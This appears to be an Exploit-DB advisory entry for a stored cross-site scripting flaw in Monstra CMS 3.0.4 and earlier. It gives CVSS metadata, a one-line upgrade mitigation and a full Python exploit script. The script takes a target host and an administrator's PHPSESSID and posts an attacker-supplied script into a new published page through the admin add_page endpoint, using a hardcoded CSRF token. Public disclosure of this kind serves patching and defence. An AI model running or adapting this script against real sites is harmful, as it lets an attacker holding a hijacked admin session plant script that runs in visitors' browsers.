Monstra CMS < 3.0.4 - Cross-Site Scripting

vendor:

Monstra CMS

by:

DEEPIN2

8.8

CVSS

HIGH

Cross-Site Scripting

CWE

Product Name: Monstra CMS

Affected Version From: 3.0.4 and earlier

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: a:monstra:monstra_cms

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: N/A

2018

Monstra CMS < 3.0.4 - Cross-Site Scripting

Monstra CMS version 3.0.4 and earlier is vulnerable to Cross-Site Scripting. An attacker can exploit this vulnerability by intercepting the first request through a proxy tool to verify the CSRF token and then sending a malicious script to the target. This can be done by sending a POST request to the target with the malicious script in the 'page_title' parameter.

Mitigation:

Upgrade to the latest version of Monstra CMS.

Source

Exploit-DB raw data:

# Title: Monstra CMS < 3.0.4 - Cross-Site Scripting
# Date: 2018-06-07
# Author: DEEPIN2
# Software: Monstra CMS
# Version: 3.0.4 and earlier
# This automation code requires Python3
# You must intercept the first request through the proxy tool to verify the CSRF token.

import requests
import re

def runXSS(target, cookie, data):
	exploit = requests.post(target, cookies=cookie, data=data).text
	if re.search('exploit', exploit):
		return 'OK'
	else:
		return 'ERROR'
	
if __name__ == '__main__':
	print('''  ______     _______     ____   ___  _  ___        _  ___  _ _  ___
 / ___\ \   / / ____|   |___ \ / _ \/ |( _ )      / |/ _ \/ / |( _ )
| |    \ \ / /|  _| _____ __) | | | | |/ _ \ _____| | | | | | |/ _ `
| |___  \ V / | |__|_____/ __/| |_| | | (_) |_____| | |_| | | | (_) |
 \____|  \_/  |_____|   |_____|\___/|_|\___/      |_|\___/|_|_|\___/
 	[*] Author : DEEPIN2(Junseo Lee)
---------------------------------------------------------------------''')
	print('[*] Ex) http://www.target.com -> www.target.com')
	url = input('Target : ')
	print('[*] Required admin\'s PHPSESSID.')
	PHPSESSID = input('PHPSESSID : ')
	pagename = input('Pagename : ')
	script = input('Script : ')
	target = 'http://' + url + '/admin/index.php?id=pages&action=add_page'
	cookie = {'PHPSESSID':PHPSESSID}
	data = {'csrf':'9c1763649f4e5ce611d29ef5cd10914fa61e91f5',\
			'page_title':script,\
			'page_name':pagename,\
			'page_meta_title':'',\
			'page_keywords':'',\
			'page_description':'',\
			'pages':0,\
			'templates':'index',\
			'status':'published',\
			'access':'public',\
			'editor':'',\
			'page_tags':'',\
			'add_page_and_exit':'Save+and+Exit',\
			'page_date':'9999-99-99'}

	result = runXSS(target, cookie, data)
	print('-' * 69)
	if result == 'OK':
		print('[+] LINK : http://' + url + '/' + pagename)
	else:
		print('[-] Error')